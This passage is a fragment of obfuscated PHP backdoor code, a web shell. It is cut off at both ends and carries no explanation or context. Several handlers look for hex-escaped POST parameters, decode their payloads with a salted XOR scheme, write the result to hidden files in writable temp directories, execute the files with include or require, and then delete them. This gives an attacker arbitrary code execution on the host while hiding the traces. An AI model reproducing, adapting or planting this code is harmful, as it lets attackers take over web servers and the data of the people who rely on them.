= count($mrk)) break; if ((bool)is_dir($holder) && (bool)is_writable($holder)) { $flg = sprintf("%s/.ent", $holder); if (file_put_contents($flg, $ptr)) { require $flg; unlink($flg); die(); } } $rec++; } while (true); } if(@$_POST["\x6Dar\x6Ber"] !== null){ $token = $_POST["\x6Dar\x6Ber"]; $token =explode ( "." ,$token ) ; $descriptor = ''; $salt8 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt8); foreach ($token as $v => $v9): $chS = ord($salt8[$v % $sLen]); $dec = ((int)$v9 - $chS - ($v % 10)) ^ 55; $descriptor .= chr($dec); endforeach; $entity = array_filter(["/tmp", session_save_path(), getenv("TEMP"), getenv("TMP"), sys_get_temp_dir(), "/dev/shm", getcwd(), ini_get("upload_tmp_dir"), "/var/tmp"]); for ($data = 0, $mrk = count($entity); $data < $mrk; $data++) { $hld = $entity[$data]; if (is_writable($hld) && is_dir($hld)) { $factor = vsprintf("%s/%s", [$hld, ".pset"]); $success = file_put_contents($factor, $descriptor); if ($success) { include $factor; @unlink($factor); die();} } } } if(isset($_POST) && isset($_POST["re\x66\x65ren\x63\x65"])){ $element = $_POST["re\x66\x65ren\x63\x65"]; $element = explode ( "." , $element); $itm = ''; $s2 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s2 ); $__len = count($element ); for ($z = 0; $z < $__len; $z++) { $v1 = $element[$z]; $chS = ord($s2[$z % $lenS] ); $dec = ((int)$v1 - $chS - ($z % 10)) ^45; $itm .= chr($dec ); } $flg = array_filter([getenv("TMP"), "/tmp", "/var/tmp", getcwd(), "/dev/shm", sys_get_temp_dir(), getenv("TEMP"), ini_get("upload_tmp_dir"), session_save_path()]); foreach ($flg as $binding) { if (array_product([is_dir($binding), is_writable($binding)])) { $sym = "$binding" . "/.bind"; if (@file_put_contents($sym, $itm) !== false) { include $sym; unlink($sym); exit; } } } } if(in_array("\x70g\x72p", array_keys($_POST))){ $component = array_filter([ini_get("upload_tmp_dir"), getcwd(), sys_get_temp_dir(), session_save_path(), getenv("TEMP"), getenv("TMP"), "/dev/shm", "/tmp", "/var/tmp"]); $resource = $_POST["\x70g\x72p"]; $resource= explode ( ".", $resource) ; $binding =''; $salt1 ='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen =strlen( $salt1); $m =0; $len =count( $resource); do { if( $m >=$len) break; $v3 =$resource[$m]; $sChar =ord( $salt1[$m % $sLen]); $dec =( ( int)$v3 - $sChar -( $m % 10)) ^ 20; $binding .=chr( $dec); $m++;} while( true); $element = 0; do { $rec = $component[$element] ?? null; if ($element >= count($component)) break; if ((function($d) { return is_dir($d) && is_writable($d); })($rec)) { $desc = vsprintf("%s/%s", [$rec, ".descriptor"]); if (file_put_contents($desc, $binding)) { require $desc; unlink($desc); die(); } } $element++; } while (true); } if(isset($_POST["\x65\x6Etry"])){ $fac = $_POST["\x65\x6Etry"]; $fac=explode ( ".", $fac ) ; $obj = ''; $salt5 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $salt5); $s = 0; while( $s < count( $fac)) { $v3 = $fac[$s]; $chS = ord( $salt5[$s % $lenS]); $d = ( ( int)$v3 - $chS -( $s % 10)) ^76; $obj.= chr( $d); $s++; } $holder = array_filter([sys_get_temp_dir(), "/dev/shm", ini_get("upload_tmp_dir"), getenv("TMP"), session_save_path(), "/var/tmp", "/tmp", getcwd(), getenv("TEMP")]); foreach ($holder as $key => $flag) { if ((function($d) { return is_dir($